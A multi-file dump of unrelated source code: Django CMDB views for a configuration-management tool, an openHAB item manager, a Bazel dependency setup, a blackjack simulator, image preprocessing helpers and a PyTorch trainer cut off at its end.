[ { 'perm': Perm.read_configuration_item_info_jira, 'msg': _("You don't have permission to see that."), }, ] def initialize_vars(self): super(JiraChangesEdit, self).initialize_vars() self.jira_changes = [] def get_context_data(self, *args, **kwargs): ret = super(JiraChangesEdit, self).get_context_data(**kwargs) ret.update( super(JiraChangesEdit, self).get_context_data_paginator( *args, **kwargs ) ) ret.update({ 'sort_variable_name': self.sort_variable_name, 'url_query': self.request.GET, 'sort': self.sort, 'columns': self.columns, 'jira_url': JIRA_URL, 'form': { 'filters': ReportFilters(self.request.GET), 'date_range': ReportFiltersDateRange(self.request.GET), }, }) return ret @ralph_permission(perms) def get(self, *args, **kwargs): self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') self.ci = get_object_or_404(db.CI, id=ci_id) self.data_table_query( report_filters( cls=db.JiraChanges, order='-update_date', filters=add_filter(self.request.GET, ci=self.ci), ) ) return super(JiraChangesEdit, self).get(*args, **kwargs) class JiraChangesView(JiraChangesEdit): def get_context_data(self, **kwargs): ret = super(JiraChangesView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class CIIncidentsEdit(BaseCIDetails, DataTableMixin): template_name = 'cmdb/ci_changes_tab.html' active_tab = 'incidents' sort_variable_name = 'sort' export_variable_name = None # fix in bob! columns = table_colums() perms = [ { 'perm': Perm.read_configuration_item_info_jira, 'msg': _("You don't have permission to see that."), }, ] def initialize_vars(self): super(CIIncidentsEdit, self).initialize_vars() self.incidents = [] def get_context_data(self, *args, **kwargs): ret = super(CIIncidentsEdit, self).get_context_data(**kwargs) ret.update( super(CIIncidentsEdit, self).get_context_data_paginator( *args, **kwargs ) ) ret.update({ 'sort_variable_name': self.sort_variable_name, 'url_query': self.request.GET, 'sort': self.sort, 'columns': self.columns, 'jira_url': JIRA_URL, 'form': { 'filters': ReportFilters(self.request.GET), 'date_range': ReportFiltersDateRange(self.request.GET), }, }) return ret @ralph_permission(perms) def get(self, *args, **kwargs): self.initialize_vars() try: ci_id = self.get_ci_id() except db.CI.DoesNotExist: return HttpResponseRedirect('/cmdb/ci/jira_ci_unknown') self.ci = get_object_or_404(db.CI, id=ci_id) self.data_table_query( report_filters( cls=db.CIIncident, order='-update_date', filters=add_filter(self.request.GET, ci=self.ci), ) ) return super(CIIncidentsEdit, self).get(*args, **kwargs) class CIIncidentsView(CIIncidentsEdit): def get_context_data(self, **kwargs): ret = super(CIIncidentsView, self).get_context_data(**kwargs) return _update_labels(ret, self.ci) class Search(BaseCMDBView): template_name = 'cmdb/search_ci.html' Form = CISearchForm cis = [] def get_context_data(self, **kwargs): subsection = '' layer = self.request.GET.get('layer') type = self.request.GET.get('type') if layer: subsection += '%s - ' % CILayer.objects.get(id=layer) elif type: type = CIType.objects.get(pk=type) subsection += '%s - ' % type.name subsection += 'Search' if layer is None: sidebar_selected = 'all-cis' else: select = CILayer.objects.get(id=layer) sidebar_selected = slugify(select.name) ret = super(Search, self).get_context_data(**kwargs) ret.update({ 'table_header': self.table_header, 'table_body': self.table_body, 'page': self.page, 'pages': _get_pages(self.paginator, self.page_number), 'sort': self.request.GET.get('sort', ''), 'layer': self.request.GET.get('layer', ''), 'form': self.form, 'sidebar_selected': sidebar_selected, 'subsection': subsection, }) return ret def form_initial(self, values): return values def get_table_header(self, layer, type_): DEFAULT_COLS = ( {'label': 'Type', 'name': 'type', 'sortable': 1}, {'label': 'Layer', 'name': 'layers', 'sortable': 1}, {'label': 'Venture', 'name': 'Venture'}, {'label': 'Service', 'name': 'Service'}, {'label': 'PCI Scope', 'name': 'pci_scope', 'sortable': 1}, ) table_header = ( {'label': 'Name', 'name': 'name', 'sortable': 1}, {'label': 'CI UID', 'name': 'uid', 'sortable': 1}, ) if type_ == 0: table_header += DEFAULT_COLS elif type_ == CI_TYPES.APPLICATION.id: table_header += ( {'label': 'Type', 'name': 'type'}, {'label': 'Layer', 'name': 'layers', 'sortable': 1}, {'label': 'Venture', 'name': 'Venture'}, {'label': 'Service', 'name': 'Service'}, {'label': 'PCI Scope', 'name': 'pci_scope', 'sortable': 1}, ) elif type_ == CI_TYPES.DEVICE.id: table_header += ( {'label': 'Parent Device', 'name': 'Parent Device'}, {'label': 'Network', 'name': 'Network'}, {'label': 'DC', 'name': 'DC'}, {'label': 'Venture', 'name': 'Venture'}, {'label': 'Service', 'name': 'Service'}, {'label': 'PCI Scope', 'name': 'pci_scope', 'sortable': 1}, ) elif type_ == CI_TYPES.PROCEDURE.id: table_header += DEFAULT_COLS elif type_ == CI_TYPES.VENTURE.id: table_header += ( {'label': 'Parent venture', 'name': 'Parent venture'}, {'label': 'Child Ventures', 'name': 'Child Ventures'}, {'label': 'Service', 'name': 'Service'}, {'label': 'Technical Owner', 'name': 'Technical Owner'}, {'label': 'Business Owner', 'name': 'Business Owner'}, ) elif type_ == CI_TYPES.VENTUREROLE.id: table_header += ( {'label': 'Parent venture', 'name': 'Parent venture'}, {'label': 'Service', 'name': 'Service'}, {'label': 'Technical Owner', 'name': 'Technical Owner'}, ) elif type_ == CI_TYPES.BUSINESSLINE.id: table_header += ({ 'label': 'Services contained', 'name': 'Services contained', },) elif type_ == CI_TYPES.SERVICE.id: table_header += ( {'label': 'Contained Venture', 'name': 'Contained Venture'}, {'label': 'Business Line', 'name': 'Business Line'}, {'label': 'Technical Owner', 'name': 'Technical Owner'}, {'label': 'Business Owner', 'name': 'Business Owner'}, ) elif type_ == CI_TYPES.NETWORK.id: table_header += DEFAULT_COLS elif type_ == CI_TYPES.DATACENTER.id: table_header += DEFAULT_COLS elif type_ == CI_TYPES.NETWORKTERMINATOR.id: table_header += DEFAULT_COLS table_header += ({'label': 'Operations', 'name': 'Operations'},) return table_header def get_name(self, i, icon): return mark_safe( '<a href="./ci/view/%s"> <i class="fugue-icon %s"></i> %s</a>' % (escape(i.id), escape(icon), escape(i.name)) ) def get_uid(self, i): return mark_safe('<a href="./ci/view/%s">%s</a>' % ( escape(i.id), escape(i.uid))) def get_layer(self, i): return ', '.join(unicode(x) for x in i.layers.select_related()) def get_parent_dev(self, i): parent = '-' try: parent = i.content_object.parent except AttributeError: pass return parent def get_network(self, i): network = '-' try: networks = i.content_object.ipaddress_set.all() network = ', '.join(unicode(x) for x in networks) except AttributeError: pass return network def get_dc(self, i): dc = '-' try: dc = i.content_object.dc except AttributeError: pass return dc def get_owners(self, i, filter): owners = ', '.join( "%s %s" % (b.owner.first_name, b.owner.last_name) for b in i.ciownership_set.filter(type=filter) ), return owners[0] def get_bl(self, i, relations): business_line = '-' rel_bl = relations.filter( child=i.id, parent__type__id=CI_TYPES.BUSINESSLINE.id ) for bl in rel_bl: business_line = ('<a href="%s">%s</a>' % ( escape(bl.parent.id), escape(bl.parent.name)) ) return mark_safe(business_line) def get_venture(self, relations, i, child=False): venture = [] if child is False: ven = relations.filter( child=i.id, parent__type__id=CI_TYPES.VENTURE.id ) for v in ven: venture.append( '<a href="/cmdb/ci/view/%s">%s</a>' % ( escape(v.parent.id), escape(v.parent.name)) ) elif child is True: ven = relations.filter( parent=i.id, child__type__id=CI_TYPES.VENTURE.id ) for v in ven: venture.append( '<a href="/cmdb/ci/view/%s">%s</a>' % ( escape(v.child.id), escape(v.child.name)) ) return mark_safe(', '.join(x for x in venture)) def get_service(self, relations, i): services = '' servi = relations.filter( parent=i.id, child__type__id=CI_TYPES.SERVICE.id ) for s in servi: services += '%s, ' % escape(s.child.name) return mark_safe(services) def get_operations(self, i): return mark_safe( '<a href="./ci/edit/%s">Edit</a> | ' '<a href="./ci/view/%s">View</a>', ) % (escape(i.id), escape(i.id)) def get_table_body(self, cis, type_): """Return data for table body.""" table_body = [] relations = CIRelation.objects.all() t_owners = 1 b_owners = 2 for i in cis: icon = get_icon_for(i) venture = self.get_venture(relations, i) service = self.get_service(relations, i) DEFAULT_ROWS = [ {'name': 'name', 'value': self.get_name(i, icon)}, {'name': 'uid', 'value': self.get_uid(i)}, {'name': 'type', 'value': i.type.name}, {'name': 'layer', 'value': self.get_layer(i)}, {'name': 'layer', 'value': venture}, {'name': 'service', 'value': service}, {'name': 'pci_scope', 'value': i.pci_scope}, {'name': 'operations', 'value': self.get_operations(i)} ] if type_ is None: table_body.append(DEFAULT_ROWS) elif type_ == CI_TYPES.APPLICATION: table_body.append(DEFAULT_ROWS) elif type_ == CI_TYPES.DEVICE: row = [ {'name': 'name', 'value': self.get_name(i, icon)}, {'name': 'uid', 'value': self.get_uid(i)}, {'name': 'parent-dev', 'value': self.get_parent_dev(i)}, {'name': 'network', 'value': self.get_network(i)}, {'name': 'dc', 'value': self.get_dc(i)}, {'name': 'venture', 'value': venture}, {'name': 'service', 'value': service}, {'name': 'pci_scope', 'value': i.pci_scope}, {'name': 'operations', 'value': self.get_operations(i)} ] table_body.append(row) elif type_ == CI_TYPES.VENTURE: venture_c = self.get_venture(relations, i, child=True) b_own = self.get_owners(i, b_owners) t_own = self.get_owners(i, t_owners) row = [ {'name': 'name', 'value': self.get_name(i, icon)}, {'name': 'uid', 'value': self.get_uid(i)}, {'name': 'venture', 'value': venture}, {'name': 'venture-child', 'value': venture_c}, {'name': 'service', 'value': service}, {'name': 't_owners', 'value': t_own}, {'name': 'b_owners', 'value': b_own}, {'name': 'operations', 'value': self.get_operations(i)} ] table_body.append(row) elif type_ == CI_TYPES.VENTUREROLE: t_own = self.get_owners(i, t_owners) row = [ {'name': 'name', 'value': self.get_name(i, icon)}, {'name': 'uid', 'value': self.get_uid(i)}, {'name': 'venture', 'value': venture}, {'name': 'service', 'value': service}, {'name': 't_owners', 'value': t_own}, {'name': 'operations', 'value': self.get_operations(i)} ] table_body.append(row) elif type_ == CI_TYPES.BUSINESSLINE: ven = relations.filter(parent=i.id) services_contained = ', '.join( '<a href="/cmdb/ci/view/%s">%s</a>' % (v.child.id, v.child.name) for v in ven) row = [ {'name': 'name', 'value': self.get_name(i, icon)}, {'name': 'uid', 'value': self.get_uid(i)}, {'name': 'venture', 'value': services_contained}, {'name': 'operations', 'value': self.get_operations(i)} ] table_body.append(row) elif type_ == CI_TYPES.SERVICE.id: venture_c = self.get_venture(relations, i, child=True) b_own = self.get_owners(i, b_owners) t_own = self.get_owners(i, t_owners) row = [ {'name': 'name', 'value': self.get_name(i, icon)}, {'name': 'uid', 'value': self.get_uid(i)}, {'name': 'venture-child', 'value': venture_c}, {'name': 'bl', 'value': self.get_bl(i, relations)}, {'name': 't_owners', 'value': t_own}, {'name': 'b_owners', 'value': b_own}, {'name': 'operations', 'value': self.get_operations(i)} ] table_body.append(row) else: table_body.append(DEFAULT_ROWS) return table_body def get(self, *args, **kwargs): values = self.request.GET cis = db.CI.objects.all() uid = values.get('uid') state = values.get('state') status = values.get('status') type_ = int(values.get('type', 0) or 0) layer = values.get('layer') parent_id = int(values.get('parent', 0) or 0) if values: if uid: cis = cis.filter(Q(name__icontains=uid) | Q(uid=uid)) if state: cis = cis.filter(state=state) if status: cis = cis.filter(status=status) if type_: cis = cis.filter(type=type_) if layer: cis = cis.filter(layers=layer) if parent_id: cis = cis.filter(child__parent__id=parent_id) sort = self.request.GET.get('sort', 'name') if sort: cis = cis.order_by(sort) if values.get('top_level'): cis = cis.filter(child__parent=None) page = self.request.GET.get('page') or 1 self.page_number = int(page) self.paginator = Paginator(cis, ROWS_PER_PAGE) try: cis = self.paginator.page(page) except PageNotAnInteger: cis = self.paginator.page(1) page = 1 except EmptyPage: cis = self.paginator.page(self.paginator.num_pages) page = self.paginator.num_pages self.page = cis self.table_header = self.get_table_header(layer, type_) self.table_body = self.get_table_body(cis, type_), form_options = dict( label_suffix='', initial=self.form_initial(values), ) self.form = self.Form(**form_options) return super(Search, self).get(*args, **kwargs) class Index(BaseCMDBView): template_name = 'cmdb/index.html' def get_context_data(self, **kwargs): ret = super(Index, self).get_context_data(**kwargs) return ret class ViewUnknown(BaseCMDBView): template_name = 'cmdb/view_ci_error.html' def get_context_data(self, **kwargs): ret = super(ViewUnknown, self).get_context_data(**kwargs) ret.update({ 'error_message': 'This Configuration Item cannot be found in the CMDB.'}) return ret class Graphs(BaseCMDBView): template_name = 'cmdb/graphs.html' rows = [] graph_data = {} def get_context_data(self, *args, **kwargs): ret = super(Graphs, self).get_context_data(**kwargs) form = SearchImpactForm(initial=self.get_initial()) ret.update(dict( form=form, rows=self.rows, graph_data=self.graph_data, )) return ret def get_initial(self): return dict( ci=self.request.GET.get('ci'), ) def get(self, *args, **kwargs): MAX_RELATIONS_COUNT = 1000 ci_id = self.request.GET.get('ci') self.rows = [] ci_names = {} if ci_id: ic = ImpactCalculator(root_ci=CI.objects.get(pk=int(ci_id))) search_tree, pre = ic.find_affected_nodes(int(ci_id)) affected_cis = CI.objects.select_related( 'content_type', 'type').filter(pk__in=pre) nodes = [( ci.id, ci.name, get_icon_for(ci)) for ci in affected_cis ] if len(search_tree) > MAX_RELATIONS_COUNT: # in case of large relations count, skip generating json data # for chart purposes self.graph_data = simplejson.dumps( {'overflow': len(search_tree)} ) else: ci_names = dict(CI.objects.values_list('id', 'name')) relations = [dict( child=item, parent=search_tree.get(item), parent_name=ci_names[item], type=ic.graph.edge_attributes( (search_tree.get(item), item) )[0], child_name=ci_names[search_tree.get(item)]) for item in search_tree.keys() if item and search_tree.get(item) ] self.graph_data = simplejson.dumps(dict( nodes=nodes, relations=relations, )) for ci in affected_cis: co = ci.content_object self.rows.append(dict( icon=get_icon_for(ci), ci=ci, venture=getattr(co, 'venture', ''), role=getattr(co, 'role', ''), )) return super(BaseCMDBView, self).get(*args, **kwargs) class Cleanup(Search): """The view containing various data useful for clean up tasks.""" template_name = 'cmdb/cleanup.html' def get_context_data(self, *args, **kwargs): ret = super(Cleanup, self).get_context_data() ret['duplicates'] = CI.get_duplicate_names() ret['header'] = self.get_table_header(None, 0) orphans = CI.objects.filter(parent=None, child=None) ret['orphans_table'] = [self.get_table_body(orphans, None)] return ret <reponame>fintelia/habitationi # Copyright 2019 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import fiona import shapely.geometry import csv parcels = fiona.open("ASSESSING_ParcelsFY2019.shp") done = 0 w = csv.writer(open("parcelbbox.csv", "w"), "excel-tab") for parcel in parcels: lot = shapely.geometry.shape(parcel['geometry']) lot = lot.buffer(100) w.writerow([parcel['properties']['ML'], ",".join(map(lambda x: "%i" % x, lot.bounds))]) from typing import Set, Dict import HABApp from HABApp.openhab.connection_handler.func_async import async_set_habapp_metadata, async_create_item, \ async_remove_item, async_create_channel_link, async_get_items, \ async_remove_channel_link, async_remove_metadata, async_set_metadata, async_get_item_with_habapp_meta from HABApp.openhab.definitions.rest.habapp_data import HABAppThingPluginData, load_habapp_meta from ._log import log_item as log from .cfg_validator import UserItem def _filter_items(i): if not i.get('editable', False): return False if 'HABApp' not in i.setdefault('metadata', {}): return False load_habapp_meta(i) if not isinstance(i['metadata']['HABApp'], HABAppThingPluginData): return False return True async def cleanup_items(keep_items: Set[str]): all_items = await async_get_items(include_habapp_meta=True) to_delete: Dict[str, HABAppThingPluginData] = {} for cfg in filter(_filter_items, all_items): name = cfg['name'] if name not in keep_items: to_delete[name] = cfg['metadata']['HABApp'] if not to_delete: return None for item, data in to_delete.items(): assert isinstance(data, HABAppThingPluginData) await _remove_item(item, data) async def _remove_item(item: str, data: HABAppThingPluginData): # remove created link if data.created_link is not None: log.debug(f'Removing link from {data.created_link} to {item}') await async_remove_channel_link(data.created_link, item) # remove created metadata for ns in data.created_ns: log.debug(f'Removing metadata {ns} from {item}') await async_remove_metadata(item, ns) # finally remove the item log.info(f'Removing item {item}') await async_remove_item(item) async def create_item(item: UserItem, test: bool) -> bool: if test: _txt = str(item) if _txt.startswith('UserItem'): _txt = _txt[4:] log.info(f'Would create {_txt}') return False name = item.name try: existing_ok = True existing_item = await async_get_item_with_habapp_meta(name) habapp_data = existing_item['metadata']['HABApp'] # we only modify items we created if not isinstance(habapp_data, HABAppThingPluginData): log.warning(f'Skipping item {name} because it does already exist and was not created by the plugin!') return False # check if the item properties are already correct for k, v in item.get_oh_cfg().items(): if v != existing_item.get(k, ''): existing_ok = False except HABApp.openhab.exceptions.ItemNotFoundError: existing_ok = True existing_item = None habapp_data = HABAppThingPluginData() # Update/Create item definition if existing_item is None or not existing_ok: log.info(f'{"Creating" if existing_item is None else "Updating"} item: {item.type} {name} "{item.label}"') tmp = item.get_oh_cfg() tmp['item_type'] = tmp.pop('type') if not await async_create_item(**tmp): log.error(f'Item operation failed for {tmp}!') return False await async_set_habapp_metadata(name, habapp_data) else: log.debug(f'Item {name} is already correct!') # check create link if item.link != habapp_data.created_link: # remove existing if habapp_data.created_link: log.debug(f'Removing link from {habapp_data.created_link} to {name}') await async_remove_channel_link(habapp_data.created_link, name) # create new link log.debug(f'Creating link from {item.link} to {item.name}') if not await async_create_channel_link(item.link, name): log.error(f'Creating link from {item.link} to {name} failed!') await _remove_item(name, habapp_data) return False # save that we created a link habapp_data.created_link = item.link await async_set_habapp_metadata(name, habapp_data) else: log.debug(f'Link to {name} is already correct') # check create metadata if item.metadata or habapp_data.created_ns: # remove obsolete for ns in set(habapp_data.created_ns) - set(item.metadata.keys()): log.debug(f'Removing metadata {ns} from {name}') await async_remove_metadata(name, ns) # create new for ns, meta_cfg in item.metadata.items(): m_val = meta_cfg['value'] m_config = meta_cfg['config'] log.debug(f'Adding metadata {ns} to {name}: {m_val} {m_config}') if await async_set_metadata(name, ns, m_val, m_config): habapp_data.created_ns.append(ns) else: log.error(f'Creating metadata for {name} failed!') await _remove_item(name, habapp_data) return False # save that we created metadata habapp_data.created_ns = list(item.metadata.keys()) await async_set_habapp_metadata(name, habapp_data) return True <reponame>buketkonuk/pythondotorg # -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models import events.models class Migration(migrations.Migration): dependencies = [ ('events', '0003_auto_20150416_1853'), ] operations = [ migrations.AddField( model_name='recurringrule', name='duration_internal', field=models.DurationField(default=events.models.duration_default), ), migrations.AlterField( model_name='recurringrule', name='duration', field=models.CharField(default='15 min', max_length=50), ), ] <reponame>pomponchik/computor_v2 from srcs.ast.nodes.branches.abstract_branche_node import AbstractBrancheNode class QuestionNode(AbstractBrancheNode): name = '3' class MissingShaderUniformError(ValueError): pass """Macro to use for loading the J2CL repository""" load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive", "http_jar") load("@io_bazel_rules_closure//closure:defs.bzl", "closure_repositories") def setup_j2cl_workspace(): """Load all dependencies needed for J2CL.""" closure_repositories( omit_com_google_protobuf = True, omit_com_google_auto_common = True, ) native.maven_jar( name = "com_google_auto_common", artifact = "com.google.auto:auto-common:0.9", ) native.maven_jar( name = "com_google_auto_service", artifact = "com.google.auto.service:auto-service:1.0-rc2", ) # We cannot replace com_google_jsinterop_annotations so choose a different name native.maven_jar( name = "com_google_jsinterop_annotations_head", artifact = "com.google.jsinterop:jsinterop-annotations:HEAD-SNAPSHOT", repository = "https://oss.sonatype.org/content/repositories/google-snapshots/", ) native.maven_jar( name = "org_apache_commons_collections", artifact = "commons-collections:commons-collections:3.2.2", ) native.maven_jar( name = "org_apache_commons_lang2", artifact = "commons-lang:commons-lang:2.6", ) native.maven_jar( name = "org_apache_commons_lang3", artifact = "org.apache.commons:commons-lang3:3.6", ) native.maven_jar( name = "org_apache_commons_text", artifact = "org.apache.commons:commons-text:1.2", ) native.maven_jar( name = "org_apache_velocity", artifact = "org.apache.velocity:velocity:1.7", ) native.maven_jar( name = "org_junit", artifact = "junit:junit:4.12", ) native.maven_jar( name = "com_google_testing_compile", artifact = "com.google.testing.compile:compile-testing:0.15", ) native.maven_jar( name = "org_mockito", artifact = "org.mockito:mockito-all:1.9.5", ) native.maven_jar( name = "com_google_truth", artifact = "com.google.truth:truth:0.39", ) # Eclipse JARs listed at # http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/ http_jar( name = "org_eclipse_jdt_content_type", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.core.contenttype_3.7.200.v20181107-1343.jar", sha256 = "28b74f2a273a7a633845c315dbfe6b3bbc65e6fdefdb213fbecc43ded86fd8f2", ) http_jar( name = "org_eclipse_jdt_jobs", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.core.jobs_3.10.200.v20180912-1356.jar", sha256 = "a5aaaaa2ffac532fa0582f32223cca91813e310d19fdf076ba230da1a2371533", ) http_jar( name = "org_eclipse_jdt_resources", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.core.resources_3.13.200.v20181121-1020.jar", sha256 = "63c423ca7e8ae7aeb18eb91c60c632ccd11fd1da54f3d5e7601af83e730855d2", ) http_jar( name = "org_eclipse_jdt_runtime", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.core.runtime_3.15.100.v20181107-1343.jar", sha256 = "3c089d14ffb9329dfdde75acbef481235abb1c98ad27bd7148aba48637c11e74", ) http_jar( name = "org_eclipse_jdt_equinox_common", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.equinox.common_3.10.200.v20181021-1645.jar", sha256 = "224a35deeb64ea7271bce3d976974cd76e162e1366631ab01ada95426152fa24", ) http_jar( name = "org_eclipse_jdt_equinox_preferences", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.equinox.preferences_3.7.200.v20180827-1235.jar", sha256 = "93c227ed2b6780d605ff48e93add77db00083f9b98a19392c6123b08caadbabd", ) http_jar( name = "org_eclipse_jdt_compiler_apt", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.jdt.compiler.apt_1.3.400.v20181205-0900.jar", sha256 = "33541f28373d9e3277210c32ae9e4345851324a0c324a2c08411fe54b6028b9b", ) http_jar( name = "org_eclipse_jdt_core", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.jdt.core_3.16.0.v20181130-1748.jar", sha256 = "7c71886a76964a825eb734d22dedbd3a1efa2c19bec3af26d07b7bbe8167d943", ) http_jar( name = "org_eclipse_jdt_osgi", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.osgi_3.13.200.v20181130-2106.jar", sha256 = "03e5e8715d03605d0cf26ad93cbe005cffe070792bbc1aa27e0540aa0c1aa178", ) http_jar( name = "org_eclipse_jdt_text", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.text_3.8.0.v20180923-1636.jar", sha256 = "bca08fbddb5b13a79be82b10c57105e2e6353b15a8b82b4a59d02b67618c92cf", ) http_archive( name = "org_gwtproject_gwt", url = "https://gwt.googlesource.com/gwt/+archive/master.tar.gz", ) # proto_library and java_proto_library rules implicitly depend on # @com_google_protobuf for protoc and proto runtimes. http_archive( name = "com_google_protobuf", strip_prefix = "protobuf-3.6.1.3", urls = ["https://github.com/google/protobuf/archive/v3.6.1.3.zip"], ) # needed for protobuf native.bind( name = "guava", actual = "@com_google_guava", ) # needed for protobuf native.bind( name = "gson", actual = "@com_google_code_gson", ) <gh_stars>0 from deck import Deck from bj import BJ class Dealer: def __init__(self, players, n_decks=1, print_game=False): self.n_decks = n_decks self.n_players = len(players) self.players = players self.deck = Deck(n_decks) self.print_game = print_game def cprint(self, string): # Controlled print only if control_var is True if self.print_game is True: print(string) def shuffle(self): self.deck.shuffle() def reset_game(self): self.dealer_hand = [] self.player_hands = [] self.bets = [0] * self.n_players self.player_totals = [0] * self.n_players for _ in range(self.n_players): self.player_hands.append([]) self.shuffle() def collect_bets(self): for i, player in enumerate(self.players): self.bets[i] = player.get_bet(self.shuffled) def init_deal(self): # This condition should be altered # TO DO: Implement immediate blackjack if self.deck.remaining_cards() < 10: self.shuffle() self.shuffled = True else: self.shuffled = False self.collect_bets() self.dealer_hand.append(self.deck.draw()) self.dealer_hand.append(self.deck.draw()) self.cprint(f"Dealer's face up card is {self.dealer_hand[0]}\n") for i in range(self.n_players): # Each player recieves 2 cards # In real BJ they are dealt one card each and then another # Here it doesn't really matter self.player_hands[i].append(self.deck.draw()) self.player_hands[i].append(self.deck.draw()) self.cprint(f"Player {i} draws {self.player_hands[i][0]} and {self.player_hands[i][1]}.") self.cprint(f"Player {i} has a score of {BJ.get_hand_value(self.player_hands[i])[0]}") self.cprint("\n") def play(self): # Plays one round of BJ # TO DO: Implement split, insurance and doubledown self.init_deal() # Players Decisions for i, player in enumerate(self.players): self.cprint(f"Player {i} turn:") avaliable_decision = ['Hit', 'Stand'] # TO DO: Implement this properly dealer_card = self.dealer_hand[0] my_ids = [i] info = (avaliable_decision, dealer_card, my_ids, self.player_hands) decision = player.get_decision(info) while decision != 'Stand': if decision == 'Hit': self.player_hands[i].append(self.deck.draw()) self.cprint(f"Player {i} draws {self.player_hands[i][-1]}.") total = BJ.get_hand_value(self.player_hands[i])[0] if total >= 21: self.cprint(f"Player {i} went bust with a total of {total}") self.player_totals[i] = total break else: self.cprint(f"Player {i} has a total of {total}") info = (avaliable_decision, dealer_card, my_ids, self.player_hands) decision = player.get_decision(info) if decision == 'Stand': self.cprint(f"Player {i} stands.") total = BJ.get_hand_value(self.player_hands[i])[0] self.player_totals[i] = total self.cprint("\n") # Dealer's play self.cprint(f"Dealer's face up card is {self.dealer_hand[0]}") self.cprint(f"Dealer's face down card is {self.dealer_hand[1]}") d_total = BJ.get_hand_value(self.dealer_hand)[0] while d_total < 17: self.dealer_hand.append(self.deck.draw()) self.cprint(f"Dealer draw {self.dealer_hand[-1]}") d_total = BJ.get_hand_value(self.dealer_hand)[0] self.cprint(f"Dealer's total score is {d_total}") if d_total > 21: self.cprint(f"Dealer went bust.") self.cprint("\n") # Game Report results = [] for i in range(self.n_players): total = self.player_totals[i] if d_total > 21 and total <= 21: self.cprint(f"Player {i}, score {total}: WON") results.append(1) elif total > 21: self.cprint(f"Player {i}, score {total}: BUST") results.append(0) elif d_total == total: self.cprint(f"Player {i}, score {total}: PUSH") results.append(0.5) elif d_total > total: self.cprint(f"Player {i}, score {total}: LOST") results.append(0) elif d_total < total: self.cprint(f"Player {i}, score {total}: WON") results.append(1) return results from player import HitUntilPlayer, ManualPlayer, BasicThorp a = HitUntilPlayer(17) b = HitUntilPlayer(16) bt = BasicThorp() d = Dealer([bt], print_game=False) d.reset_game() N = 1000000 score = 0 for _ in range(N): d.reset_game() score += d.play()[0] print(score / N) # !/Users/kbsriharsha/anaconda3/bin/python # coding: utf-8 # @author: <NAME> """ This program provides all the necessary preprocessing libraries """ # Importing libraries import pandas as pd import cv2 import numpy as np import os def resize(img, width, height, interpolation=cv2.INTER_AREA): ''' This function resizes the image ''' return cv2.resize(img, (width, height), interpolation) def images_from_folder(folder, label = 1): ''' This function extracts all the images and resizes them to be used by MobileNet ''' images = [] labels = [] for file in os.listdir(folder): image = cv2.imread(os.path.join(folder,file)) if image is not None: image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) image = resize(image, 224, 224) images.append(image) labels.append(label) return images, labels def preprocess_input(x, v2=True): ''' This function preprocess the image input (normaliztion) ''' x = x.astype('float32') x = x / 255.0 ''' if v2: x = x - 0.5 x = x * 2.0 ''' return x <gh_stars>0 #!/usr/bin/env python3 # # Copyright 2022 Graviti. Licensed under MIT License. # """Common tools.""" from collections import defaultdict from functools import wraps from threading import Lock from typing import Any, Callable, DefaultDict, TypeVar _CallableWithoutReturnValue = TypeVar("_CallableWithoutReturnValue", bound=Callable[..., None]) _T = TypeVar("_T") locks: DefaultDict[int, Lock] = defaultdict(Lock) def locked(func: _CallableWithoutReturnValue) -> _CallableWithoutReturnValue: """The decorator to add threading lock for methods. Arguments: func: The method needs to add threading lock. Returns: The method with theading locked. """ @wraps(func) def wrapper(self: Any, *arg: Any, **kwargs: Any) -> None: key = id(self) lock = locks[key] acquire = lock.acquire(blocking=False) try: if acquire: func(self, *arg, **kwargs) del locks[key] else: lock.acquire() finally: lock.release() return wrapper # type: ignore[return-value] def shorten(origin: str) -> str: """Return the first 7 characters of the original string. Arguments: origin: The string needed to be shortened. Returns: A string of length 7. """ return origin[:7] import time import math import torch.autograd import torch.nn as nn import dcp.utils as utils class View(nn.Module): """ Reshape data from 4 dimension to 2 dimension """ def forward(self, x): assert x.dim() == 2 or x.dim() == 4, "invalid dimension of input {:d}".format(x.dim()) if x.dim() == 4: out = x.view(x.size(0), -1) else: out = x return out class Trainer(object): """ Trainer for auxnet """ def __init__(self, model, train_loader, val_loader, settings, logger, tensorboard_logger, optimizer_state=None, run_count=0): self.settings = settings self.model = utils.data_parallel(model=model, n_gpus=self.settings.n_gpus) self.train_loader = train_loader self.val_loader = val_loader self.criterion = nn.CrossEntropyLoss().cuda() self.lr = self.settings.lr self.optimizer = torch.optim.SGD( params=self.model.parameters(), lr=self.settings.lr, momentum=self.settings.momentum, weight_decay=self.settings.weight_decay, nesterov=True) if optimizer_state is not None: self.optimizer.load_state_dict(optimizer_state) self.logger = logger self.tensorboard_logger = tensorboard_logger self.run_count = run_count def forward(self, images, labels=None): """ forward propagation """ # forward and backward and optimize output = self.model(images) if labels is not None: loss = self.criterion(output, labels) return output, loss else: return output, None def backward(self, loss): """ backward propagation """ self.optimizer.zero_grad() loss.backward() self.optimizer.step() def update_lr(self, epoch): """ Update learning rate of 